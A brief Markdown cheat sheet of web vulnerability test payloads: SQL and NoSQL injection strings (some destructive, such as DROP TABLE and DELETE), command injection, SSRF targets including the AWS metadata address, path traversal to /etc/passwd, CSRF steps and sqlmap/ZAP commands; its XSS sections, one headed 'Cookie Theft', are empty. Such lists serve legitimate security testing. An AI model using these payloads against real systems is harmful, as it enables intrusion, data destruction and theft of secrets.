# Vulnerability Test Payloads ## SQL Injection ### Text Input ``` ' OR '1'='1 ' OR 1=1 -- '; DROP TABLE users; -- ' UNION SELECT NULL, NULL -- ``` ### Numeric Input ``` 1 OR 1=1 1; DELETE FROM users; -- ``` ### Blind (Time-based) ``` ' OR SLEEP(5) -- ' AND (SELECT(SLEEP(5)))a -- ``` ## XSS (Cross-Site Scripting) ### Reflected ```html "> ``` ### DOM-based ``` javascript:alert('XSS') ``` ### Cookie Theft ```html ``` ## NoSQL Injection (MongoDB) ```json {"$ne": null} {"$gt": ""} {"$regex": ".*"} {"$where": "1==1"} ``` ## Command Injection ``` ; ls -la | whoami `whoami` $(whoami) ``` ## SSRF ``` http://localhost/admin http://127.0.0.1/admin http://169.254.169.254/ # AWS metadata ``` ## Path Traversal ``` ../../../etc/passwd ..%2F..%2F..%2Fetc%2Fpasswd ``` ## CSRF Testing 1. Submit form without CSRF token 2. Reuse captured token multiple times 3. Modify/remove token parameter ## Testing Tools ```bash # SQLMap sqlmap -u "http://example.com/page?id=1" --dbs # OWASP ZAP active scan zap-cli active-scan http://example.com ```